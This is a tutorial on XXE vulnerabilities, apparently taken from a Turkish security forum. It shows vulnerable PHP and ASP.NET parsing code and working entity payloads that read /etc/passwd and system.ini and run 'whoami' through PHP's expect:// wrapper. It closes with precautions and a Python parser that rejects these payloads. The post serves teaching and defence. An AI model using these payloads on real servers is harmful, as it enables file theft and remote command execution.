What is XXE Vulnerability?

swarq

1 May 2020


XXE is not a new feature, but it came back onto the agenda when it was found on the servers of a social media giant like Facebook. Although XML entities are a feature meant to increase XML's flexibility, that flexibility brings serious security risks with it: it enables arbitrary file reading from the server and, in some special cases, command execution on the server.

An XXE vulnerability is triggered when the server (the software running on the server side) parses XML data and resolves a specially defined XML entity. Some XML libraries allow custom entity definition and expansion by default, while others have this feature turned off. For the attack to succeed, the feature must be enabled on the target system.

XXE scenario with PHP:



In the example scenario, a simple PHP script parses the XML data received in the request body and prints it to the screen.


Code:

<?php
// Read the raw POST body and parse it as XML; entities are resolved by libxml.
$xml = simplexml_load_string(file_get_contents("php://input"));
echo $xml;
?>

When a POST request containing a simple XML document is sent to the server (the HttpRequester tool is used in the example), the value of the element is returned in the response.

Code:

<?xml version="1.0" ?><tag>test</tag>

For example, the request above returns the answer "test". The problem, as always, arises when the request is not so innocent: when an entity is defined in the request and used to read the contents of a file on the server, the request will again succeed.

Code:

<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "file:///etc/passwd">]><tag>&ups;</tag>

When the above XML is sent to the server, the contents of the server's "/etc/passwd" file are returned. Depending on the characters it contains, the file being read may break the XML structure or something else in the application. If the target application is written in PHP, as in the example, the following payload can be used to encode the file contents as base64.


Code:

<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]><tag>&ups;</tag>

The returned answer is base64-decoded to obtain the file contents. As with other arbitrary file read vulnerabilities, in some special cases XXE can be used to run a command on the target server. For example, if the target application is PHP and PHP's "expect" module (PECL :: Package :: expect) is installed ...

Code:

<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "expect://whoami">]><tag>&ups;</tag>

... the "whoami" command can be run on the system using the payload above.

XXE Scenario with ASP.NET:



The code below is used on the server side to demonstrate the XXE vulnerability with ASP.NET and C#.

Code:

protected void Page_Load(object sender, EventArgs e)
{
    // DtdProcessing.Parse makes the reader interpret the DOCTYPE and resolve its entities.
    XmlReaderSettings xrSettings = new XmlReaderSettings();
    xrSettings.DtdProcessing = DtdProcessing.Parse;
    XDocument document = XDocument.Load(XmlReader.Create(Request.InputStream, xrSettings));
    Response.Write(document.ToString());
}


In short, an XmlReader object is created that reads the body of the POST request via Request.InputStream; it is passed as a parameter to XDocument.Load and the XML data is parsed. Setting the "DtdProcessing" property of the XmlReaderSettings object to "DtdProcessing.Parse" ensures that the DTD / DOCTYPE section of the XML is interpreted.

An ordinary XML sent to the server ...

Code:

<?xml version="1.0"?><tag>test</tag>

... and an XML containing an XXE payload ...

Code:

<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "file:///C:/Windows/system.ini">]><tag>&ups;</tag>

SSRF Attack with XXE

To perform an SSRF attack by exploiting the XXE vulnerability, we need to define an external XML entity using the URL we target and use the defined entity in a data value. If we can use the defined entity in a data value that is returned in the application's response, we will be able to see the response from the URL in the application's response, and thus gain two-way interaction with the back end.

Blind XXE

Many XXE vulnerabilities are blind. This means that the application does not return the values of the external entities defined in its responses, so it is not possible to retrieve server-side files directly. Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques may be required.



Precautions for XXE Vulnerability

It is recommended to keep the XML processor and its libraries at the latest version and not to run older versions, to turn off the XML External Entity feature of all XML parsers in the application, and to use a filtering system such as a "whitelist". The easiest and most effective way to prevent XXE attacks is to disable these features. It is also recommended to disable XInclude support.
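As an added example (not code from the original post), the following Python shows the precaution above applied to the PHP and ASP.NET scenarios: the parser refuses any DOCTYPE or entity declaration before the document is processed, which is the equivalent of setting DtdProcessing.Prohibit instead of DtdProcessing.Parse in the C# code. The sample requests are constructed from the payloads shown earlier; the function names are my own.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class XxeRejected(Exception):
    """Input declared a DTD or an entity, which this parser does not allow."""


def _refuse_dtd(xml_bytes: bytes) -> None:
    """Pre-scan with expat and abort on the first DOCTYPE or entity declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XxeRejected(f"DOCTYPE for <{name}> is not allowed")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise XxeRejected(f"entity declaration {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Returning 0 makes expat stop instead of fetching the external resource.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parser.Parse(xml_bytes, True)


def parse_untrusted_xml(xml_bytes: bytes) -> ET.Element:
    """Parse XML from an untrusted client with DTDs and external entities refused."""
    _refuse_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)


def is_rejected(xml_bytes: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(xml_bytes)
    except XxeRejected:
        return True
    return False


# Constructed samples: the benign request and the three payloads shown above.
BENIGN = b'<?xml version="1.0"?><tag>test</tag>'
PAYLOADS = [
    b'<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "file:///etc/passwd">]><tag>&ups;</tag>',
    b'<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM '
    b'"php://filter/read=convert.base64-encode/resource=/etc/passwd">]><tag>&ups;</tag>',
    b'<?xml version="1.0"?><!DOCTYPE tag [<!ENTITY ups SYSTEM "expect://whoami">]><tag>&ups;</tag>',
]

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN).text)  # test
    print([is_rejected(p) for p in PAYLOADS])  # [True, True, True]
```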

Source: https://www.turkhackteam.org/siber-guvenlik/1979333-xxe-zafiyeti-nedir.html